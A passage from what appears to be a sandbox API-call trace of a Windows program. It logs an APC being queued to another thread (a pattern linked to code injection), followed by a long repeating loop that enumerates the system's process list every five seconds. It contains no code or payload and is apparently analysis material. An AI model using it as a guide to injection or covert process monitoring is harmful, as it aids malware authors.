[36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x1, Esi=0x1, Ebx=0x1, Edx=0x0, Ecx=0x0, Eax=0xe8, Ebp=0x19f7cc, Eip=0x8f20717, SegCs=0x23, EFlags=0x206, Esp=0x19f63c, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0141.644] NtQueueApcThread (ThreadHandle=0x1a0, ApcRoutine=0x8f2071c, NormalContext=0x0, SystemArgument1=0x0, SystemArgument2=0x0) returned 0x0 [0141.644] NtResumeThread (in: ThreadHandle=0x1a0, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0141.718] NtClose (Handle=0x1a4) returned 0x0 [0141.718] NtClose (Handle=0x1a0) returned 0x0 [0141.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0141.727] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0141.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0141.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0141.862] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0141.863] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0141.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0142.221] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0142.221] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0142.282] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0142.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0142.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0142.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0142.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0142.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0142.854] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0142.894] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0142.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0142.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0142.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0142.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0143.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0143.243] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0143.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0143.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0143.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0143.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0143.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0143.517] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0143.517] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0143.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0143.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0143.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0143.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0143.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0143.676] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0143.677] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0143.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0143.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0143.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0143.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0143.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0144.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0144.063] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0144.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0144.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0144.068] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0144.069] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0144.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0144.276] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0144.277] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0144.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0144.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0144.316] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0144.316] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0144.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0144.513] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0144.514] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0144.516] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0144.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0144.517] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0144.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0144.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0144.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0144.854] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0144.859] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0144.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0144.863] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0144.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0144.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0144.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0144.980] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0144.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0144.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0144.984] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0144.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0144.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0145.089] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0145.090] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0145.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0145.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0145.099] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0145.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0145.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0145.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0145.298] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0145.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0145.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0145.411] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0145.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0145.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0145.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0145.708] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0145.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0145.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0145.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0145.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0145.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0145.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0145.868] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0145.870] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, 